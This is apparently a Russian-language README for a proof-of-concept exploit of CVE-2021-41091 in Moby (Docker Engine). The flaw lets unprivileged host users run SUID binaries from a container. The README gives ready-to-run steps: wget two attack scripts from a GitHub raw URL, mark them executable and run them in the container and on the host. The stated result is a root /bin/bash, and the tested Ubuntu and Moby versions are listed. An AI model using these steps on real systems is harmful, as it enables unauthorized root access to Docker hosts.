
Доказательство концепции эксплуатации уязвимости CVE-2021-41091: обход каталогов в Moby (Docker Engine), позволяющий непривилегированным пользователям выполнять SUID-бинарные файлы из контейнера на хосте. Включает PoC-скрипты для Ubuntu 20.04.
Ошибка в Moby (Docker Engine) позволяет непривилегированным пользователям обходить каталоги и выполнять программы напрямую из Docker на основной машине: если в Docker есть программа с SUID, пользователь сможет выполнить её как SUID на основной машине
В терминале контейнера скачиваем файл docker.sh, затем запускаем его от root:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh
Теперь на основной машине скачиваем файл principal.sh и запускаем:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh
Запускаем команду, которую выдаст скрипт, и мы сможем выполнить /bin/bash от root
Эти скрипты были протестированы на Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) с версией Moby 20.10.5+dfsg1
ИСПОЛЬЗОВАНИЕ ЭТОГО РЕПОЗИТОРИЯ — ОТВЕТСТВЕННОСТЬ ТОГО, КТО ЕГО ИСПОЛЬЗУЕТ, А НЕ АВТОРА